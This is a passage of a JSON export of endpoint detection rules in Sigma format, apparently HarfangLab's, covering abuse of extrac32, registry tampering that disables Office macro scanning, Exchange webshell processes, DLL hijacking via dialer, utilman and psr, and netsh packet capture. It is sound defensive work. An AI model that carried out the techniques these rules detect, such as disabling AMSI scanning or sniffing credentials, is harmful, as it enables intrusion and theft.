selection:\n - Image|endswith: '\\extrac32.exe'\n - OriginalFileName: 'extrac32.exe'\n\n exclusion_hp:\n - CommandLine|startswith: '?:\\ProgramData\\HP\\'\n # C:\\Program Files\\HP\\HP ENVY 4500 series\\Bin\\HP ENVY 4500 series.exe\n # C:\\Program Files\\HP\\HP DeskJet 3630 series\\Bin\\HP DeskJet 3630 series.exe\n - GrandparentImage: '?:\\Program Files\\HP\\HP *\\Bin\\HP *.exe'\n\n exclusion_known_fp:\n # extrac32.exe /E /A /Y /L C:\\Users\\xxx\\TOSHIBA\\eSMDF\\Fax\\Resource C:\\WINDOWS\\SYSTEM32\\SPOOL\\DRIVERS\\X64\\3\\ESFMLNG6.CAB\n # extrac32.exe /E /A /Y /L C:\\Users\\xxx\\TOSHIBA\\eSMDF\\Fax\\Resource C:\\WINDOWS\\SYSTEM32\\SPOOL\\DRIVERS\\W32X86\\3\\ESFMLNG.CAB\n # extrac32.exe /E /A /Y /L C:\\Users\\xxx\\TOSHIBA\\eSMDF\\Fax\\CoverSheet C:\\WINDOWS\\SYSTEM32\\SPOOL\\DRIVERS\\X64\\3\\ESMFPSCS.CAB\n # C:\\Windows\\System32\\extrac32.exe /Y /E /L C:/ProgramData/HP/HP OfficeJet Pro 7740 series Help/Help/1036 C:/ProgramData/HP/HP OfficeJet Pro 7740 series Help/Help/1036/1036.cab\n\n CommandLine:\n - 'extrac32.exe /E /A /Y /L *\\TOSHIBA\\eSMDF\\Fax\\\\* ?:\\WINDOWS\\SYSTEM32\\SPOOL\\DRIVERS\\\\*\\3\\\\????????.CAB'\n - 'extrac32.exe /E /A /Y /L *\\TOSHIBA\\eSMDF\\Fax\\\\* ?:\\WINDOWS\\SYSTEM32\\SPOOL\\DRIVERS\\\\*\\3\\\\???????.CAB'\n - '?:\\Windows\\System32\\extrac32.exe /Y /E /L ?:/ProgramData/HP/HP * ?:/ProgramData/HP/HP *.cab'\n - '?:\\Windows\\System32\\extrac32.exe /Y /E /L ?:\\ProgramData\\HP\\HP * ?:\\ProgramData\\HP\\HP *.cab'\n\n exclusion_fujitsu_network_scanner:\n ParentImage: '?:\\Program Files (x86)\\FUJITSU\\Network Scanner Admin Tool V3\\AdminTool.exe'\n CommandLine: 'extrac32.exe /E /Y /L *.cab'\n\n exclusion_msiexec:\n ParentImage:\n - '?:\\Windows\\System32\\msiexec.exe'\n - '?:\\Windows\\SysWOW64\\msiexec.exe'\n ParentCommandLine|contains: ' -Embedding '\n\n exclusion_epson:\n CommandLine: '?:\\WINDOWS\\system32\\extrac32.exe* ?:\\Users\\\\*\\AppData\\Local\\Temp\\EPSON_Advanced_Printer_Driver_* *?:\\Users\\\\*\\AppData\\Local\\Temp\\EPSON_Advanced_Printer_Driver_*\\\\*.cab'\n\n exclusion_olympus:\n CommandLine|startswith: '?:\\WINDOWS\\system32\\extrac32.exe /Y /E /L ?:\\ProgramData\\Olympus\\UpdateManager\\Software\\'\n\n exclusion_lg:\n - ParentImage:\n - '?:\\Program Files (x86)\\LG Software\\LG Update\\URAlarm.exe'\n - '?:\\Program Files (x86)\\LG Software\\LG Update Center\\UCAlarm.exe'\n - '?:\\Program Files (x86)\\LG Software\\LG Update Center\\LGUpdateCenter.exe'\n - GrandparentImage:\n - '?:\\Program Files\\LG Software\\LG Update Center\\UCUpdate.exe'\n - '?:\\Program Files (x86)\\LG Software\\LG Update Center\\UCUpdate.exe'\n - '?:\\Program Files (x86)\\LG Software\\LG Update & Recovery\\URUpdate.exe'\n\n exclusion_integrad:\n CommandLine:\n - 'extrac32.exe /y /l ?:\\Program Files (x86)\\Integrad.3\\MIV /e *.cab'\n - 'extrac32.exe /y /l ?:\\Program Files\\Integrad.3\\MIV /e *.cab'\n\n exclusion_visual_studio:\n CommandLine: '?:\\WINDOWS\\system32\\extrac32.exe /c /y ?:\\Users\\\\*\\AppData\\Local\\Temp\\\\*\\xmldso.cab ?:\\WINDOWS\\Java\\Classes\\xmldso.cab'\n ParentImage: '?:\\Users\\\\*\\AppData\\Local\\Temp\\\\*\\javatrig.exe'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "91b1fef8-d05f-4b4b-8167-4c78611f980a",
"rule_name": "Suspicious Extrac32 Execution",
"rule_description": "Detects the execution of the Extrac32.exe Windows binary.\nExtrac32.exe is a legitimate Microsoft tool used for extracting files from .cab archive files.\nHowever, attackers may misuse it to extract malicious payloads from specially crafted cabinet files or execute arbitrary code. This technique can be used for lateral movement, data exfiltration, or persistence within a network.\nIt is recommended to investigate the source of this activity, analyze the command-line arguments to identify any suspicious file paths or contents, and review any other executions in the timeline.\n",
"rule_creation_date": "2022-08-23",
"rule_modified_date": "2025-04-10",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1218"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "91b2e839-ed45-45d4-8246-36a227383c19",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.078171Z",
"creation_date": "2026-03-23T11:45:34.078173Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.078177Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/outflanknl/Scripts/blob/master/AMSIbypasses.vba",
"https://admx.help/?Category=Office2016&Policy=office16.Office.Microsoft.Policies.Windows::L_MacroRuntimeScanScope",
"https://attack.mitre.org/techniques/T1562/001/"
],
"name": "t1562_001_disable_macroruntimescanscope_via_registry.yml",
"content": "title: Macro Runtime Scan Scope Disabled via Registry\nid: 91b2e839-ed45-45d4-8246-36a227383c19\ndescription: |\n Detects tampering with the MacroRuntimeScanScope registry value to disable runtime scanning of enabled macros.\n If the value is set to 0, the AMSI related DLLs will not be loaded in the Office process.\n It is recommended to check the process that set the registry value for suspicious activities.\nreferences:\n - https://github.com/outflanknl/Scripts/blob/master/AMSIbypasses.vba\n - https://admx.help/?Category=Office2016&Policy=office16.Office.Microsoft.Policies.Windows::L_MacroRuntimeScanScope\n - https://attack.mitre.org/techniques/T1562/001/\ndate: 2025/01/15\nmodified: 2025/08/20\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1562.001\n - attack.t1112\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.AMSIBypass\n - classification.Windows.Behavior.ConfigChange\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n TargetObject: 'HKU\\\\*\\Software\\Microsoft\\Office\\\\*\\Security\\MacroRuntimeScanScope'\n Details: 'DWORD (0x00000000)'\n\n condition: selection\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "91b2e839-ed45-45d4-8246-36a227383c19",
"rule_name": "Macro Runtime Scan Scope Disabled via Registry",
"rule_description": "Detects tampering with the MacroRuntimeScanScope registry value to disable runtime scanning of enabled macros.\nIf the value is set to 0, the AMSI related DLLs will not be loaded in the Office process.\nIt is recommended to check the process that set the registry value for suspicious activities.\n",
"rule_creation_date": "2025-01-15",
"rule_modified_date": "2025-08-20",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1112",
"attack.t1562.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "91b39af5-d022-4539-8d2f-dab920377f0d",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.075611Z",
"creation_date": "2026-03-23T11:45:34.075614Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.075618Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://thedfirreport.com/2022/03/21/phosphorus-automates-initial-access-using-proxyshell/",
"https://attack.mitre.org/techniques/T1505/003/"
],
"name": "t1505_003_webshell_exchange.yml",
"content": "title: Suspicious Process Spawned by Microsoft Exchange Web Server\nid: 91b39af5-d022-4539-8d2f-dab920377f0d\ndescription: |\n Detects a suspicious process being spawned by a Microsoft Exchange Web Server.\n Attackers may abuse vulnerabilities present in MS Exchange Web Applications to execute malicious code.\n Is is recommended to analyze this process' command-line to determine its legitimacy in the context of the web application.\nreferences:\n - https://thedfirreport.com/2022/03/21/phosphorus-automates-initial-access-using-proxyshell/\n - https://attack.mitre.org/techniques/T1505/003/\ndate: 2025/02/18\nmodified: 2025/04/10\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1505.003\n - attack.t1190\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.Exploitation\n - classification.Windows.Behavior.RemoteShell\n - classification.Windows.Behavior.Persistence\nlogsource:\n product: windows\n category: process_creation\ndetection:\n selection:\n ProcessParentCommandLine|contains: 'exchange'\n ProcessParentName: 'w3wp.exe'\n\n filter_w3wp:\n ProcessImage: '?:\\Windows\\System32\\inetsrv\\w3wp.exe'\n\n filter_wer:\n ProcessImage:\n - '?:\\Windows\\system32\\wermgr.exe'\n - '?:\\Windows\\System32\\WerFault.exe'\n\n filter_csc:\n ProcessImage: '?:\\Windows\\Microsoft.NET\\Framework64\\\\*\\csc.exe'\n\n filter_builtin_tools:\n - ProcessImage|endswith: '\\Bin\\OleConverter.exe'\n ProcessDescription: 'Microsoft Exchange Ole-To-Image converter'\n - ProcessImage|endswith: '\\Bin\\DocumentViewing\\TranscodingService.exe'\n ProcessDescription: 'TranscodingService exe'\n\n exclusion_programfiles:\n Image|startswith:\n - '?:\\Program Files (x86)\\'\n - '?:\\Program Files\\'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "91b39af5-d022-4539-8d2f-dab920377f0d",
"rule_name": "Suspicious Process Spawned by Microsoft Exchange Web Server",
"rule_description": "Detects a suspicious process being spawned by a Microsoft Exchange Web Server.\nAttackers may abuse vulnerabilities present in MS Exchange Web Applications to execute malicious code.\nIs is recommended to analyze this process' command-line to determine its legitimacy in the context of the web application.\n",
"rule_creation_date": "2025-02-18",
"rule_modified_date": "2025-04-10",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1190",
"attack.t1505.003"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "91b43324-d77f-4b23-a3e1-57b8552ab213",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.600577Z",
"creation_date": "2026-03-23T11:45:34.600580Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.600588Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_dialer.yml",
"content": "title: DLL Hijacking via dialer.exe\nid: 91b43324-d77f-4b23-a3e1-57b8552ab213\ndescription: |\n Detects potential Windows DLL Hijacking via dialer.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'dialer.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\rtutils.dll'\n - '\\SspiCli.dll'\n - '\\TAPI32.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "91b43324-d77f-4b23-a3e1-57b8552ab213",
"rule_name": "DLL Hijacking via dialer.exe",
"rule_description": "Detects potential Windows DLL Hijacking via dialer.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "91f15516-6033-4263-94a0-fc73b7b04d71",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.078731Z",
"creation_date": "2026-03-23T11:45:34.078733Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.078737Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/xforcered/WFH",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_utilman.yml",
"content": "title: DLL Hijacking via utilman.exe\nid: 91f15516-6033-4263-94a0-fc73b7b04d71\ndescription: |\n Detects potential Windows DLL Hijacking via utilman.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'utilman.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\dui70.dll'\n - '\\duser.dll'\n - '\\OLEACC.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "91f15516-6033-4263-94a0-fc73b7b04d71",
"rule_name": "DLL Hijacking via utilman.exe",
"rule_description": "Detects potential Windows DLL Hijacking via utilman.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "91f986ad-9625-4dc0-a9dc-55d37646ede1",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:35.295603Z",
"creation_date": "2026-03-23T11:45:35.295606Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:35.295613Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://kb.acronis.com/content/65335",
"https://attack.mitre.org/techniques/T1040/",
"https://attack.mitre.org/software/S0108/"
],
"name": "t1040_network_sniffing_netsh.yml",
"content": "title: Network Sniffed via netsh.exe\nid: 91f986ad-9625-4dc0-a9dc-55d37646ede1\ndescription: |\n Detects the use of built-in Windows packet capture netsh.exe to do network sniffing.\n Attackers may sniff network traffic to capture informations like the environment or authentication credentials.\n It is recommended to investigate the parent process for suspicious activities.\nreferences:\n - https://kb.acronis.com/content/65335\n - https://attack.mitre.org/techniques/T1040/\n - https://attack.mitre.org/software/S0108/\ndate: 2022/01/21\nmodified: 2026/02/17\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.discovery\n - attack.t1040\n - attack.s0108\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.Netsh\n - classification.Windows.Behavior.SensitiveInformation\n - classification.Windows.Behavior.NetworkActivity\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_image:\n - Image|endswith: '\\netsh.exe'\n - OriginalFileName: 'netsh.exe'\n selection_command:\n # netsh trace start capture=yes tracefile=%temp%\\trace.etl maxsize=10\n CommandLine|contains|all:\n - 'trace'\n - 'start'\n - 'capture'\n\n exclusion_azure:\n ParentImage: '?:\\Packages\\Plugins\\Microsoft.Azure.NetworkWatcher.NetworkWatcherAgentWindows\\\\*\\NetworkWatcherAgent\\NetworkWatcherAgent.exe'\n\n # https://learn.microsoft.com/en-us/troubleshoot/windows-client/networking/data-collection-for-troubleshooting-802-1x-authentication-issues\n exclusion_troubleshooting:\n CommandLine: 'netsh trace start scenario=wlan,wlan_wpp,wlan_dbg,wireless_dbg globallevel=0xff capture=yes maxsize=1024 tracefile=?:\\MSLOG\\\\*_wireless_cli.etl'\n\n exclusion_paloalto:\n GrandparentImage:\n - '?:\\Program Files\\Palo Alto\\GlobalProtect\\PanGPS.exe'\n - '?:\\Program Files\\Palo Alto Networks\\GlobalProtect\\PanGPS.exe'\n\n # https://learn.microsoft.com/en-us/troubleshoot/windows-client/windows-troubleshooters/introduction-to-troubleshootingscript-toolset-tssv2\n exclusion_tssv2:\n CommandLine: '?:\\WINDOWS\\system32\\netsh.exe trace start capture=yes scenario=NDIS capturetype=physical traceFile=* correlation=no *maxSize=1 fileMode=circular overwrite=yes'\n ParentCommandLine: '?:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe'\n\n exclusion_perfview:\n ProcessGrandparentOriginalFileName: 'PerfView.exe'\n ProcessParentImage: '?:\\windows\\system32\\cmd.exe'\n\n # https://learn.microsoft.com/en-us/defender-endpoint/run-analyzer-windows\n exclusion_analyzer:\n ProcessCommandLine|endswith: 'netsh.exe wfp capture start file=*\\NetTraces\\WfpDiag.cab keywords=19'\n\n condition: all of selection_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "91f986ad-9625-4dc0-a9dc-55d37646ede1",
"rule_name": "Network Sniffed via netsh.exe",
"rule_description": "Detects the use of built-in Windows packet capture netsh.exe to do network sniffing.\nAttackers may sniff network traffic to capture informations like the environment or authentication credentials.\nIt is recommended to investigate the parent process for suspicious activities.\n",
"rule_creation_date": "2022-01-21",
"rule_modified_date": "2026-02-17",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access",
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1040"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "9254d951-1bb8-4473-b6df-9eef56f82c34",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.618684Z",
"creation_date": "2026-03-23T11:45:34.618686Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.618690Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/xforcered/WFH",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_psr.yml",
"content": "title: DLL Hijacking via psr.exe\nid: 9254d951-1bb8-4473-b6df-9eef56f82c34\ndescription: |\n Detects potential Windows DLL Hijacking via psr.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'psr.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\AEPIC.dll'\n - '\\CLDAPI.dll'\n - '\\FLTLIB.DLL'\n - '\\HID.DLL'\n - '\\msdrm.dll'\n - '\\OLEACC.dll'\n - '\\SspiCli.dll'\n - '\\uireng.dll'\n - '\\version.dll'\n - '\\XmlLite.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "9254d951-1bb8-4473-b6df-9eef56f82c34",
"rule_name": "DLL Hijacking via psr.exe",
"rule_description": "Detects potential Windows DLL Hijacking via psr.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "92708e1b-412f-421c-999c-476dff6b969d",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.619744Z",
"creation_date": "2026-03-23T11:45:34.619746Z",
"enabled": true,
"hl_status": "stable",
